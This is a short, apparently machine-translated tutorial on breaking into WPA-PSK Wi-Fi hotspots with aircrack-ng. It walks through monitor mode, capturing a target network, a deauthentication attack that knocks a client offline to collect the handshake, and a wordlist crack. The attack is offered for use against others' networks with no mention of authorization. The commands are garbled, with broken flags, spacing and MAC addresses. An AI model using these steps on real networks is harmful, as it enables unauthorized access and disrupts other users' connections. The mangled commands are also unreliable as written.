caring for computer
This time, I will try to give sedkit penejelasan how the hell to break into password-type
hotspots wpa-psk with ease. This method can use the linux backtrack 4 final release
tertama origin or any linux already installed aircrack-ng application. Let's not linger see
the following article. First, prepare or Backtrack Live CD can make linux ubuntu to install
aircrack-ng application. Type the following command to install aircrack-ng in ubuntu
linux
sudo apt-get install aircrack-ng
Second, go to the desktop with the command ~ # startx (for the use backtrack)
Third, open a konsole (terminal) and type the command to view existing device
interfaces
ifconfig-a
Fourth, type the following command to enable interface wlan0
ifconfig wlan0 up
Fifth, now use the application airmon-ng airmon-ng to create a virtual interface monitor
mode by typing the command below.
airmon-ng start wlan0
Sixth, monitorlah networks around you. The trick type in this command.
airodump-ng mon0
note: mon0 is a virtual interface airmon-ng the results of earlier
Seventh, focus hotspot network monitoring that we want to collapse the password.Type
the following command again.
airodump-ng-w try-channel 11-BSSID 001 122 334 455 mon0
description: special monitoring network that has a BSSID 00:11:22:33:44:55 on channel
11 and the results of monitoring in writing to the file called 'try'. Next, use an attack by a
client disconnect to get the handshake packets required for the process of cracking
aireplay-ng -0 1-a-c 001 122 334 455 oo1cbfa13fe3 mon0
description: aireplay-ng is used for mendisconnect one client that is 00:1 C: BF: A1: 3F:
E3 to get a package
handshake is required for cracking process
-0: Deauthentication attack mode
1: do as much as 1x deauth
Finally, after getting a handshake packet, the next is the process of cracking using
aircrack and password files with existensi. Lst or. Txt with the command
try aircrack-ng *. cap-w / pentest / passwords / wordlists / listpass.txt
description: listpass.txt is the password file of my own and is located in / pentest /
passwords / wordlists / listpass.txt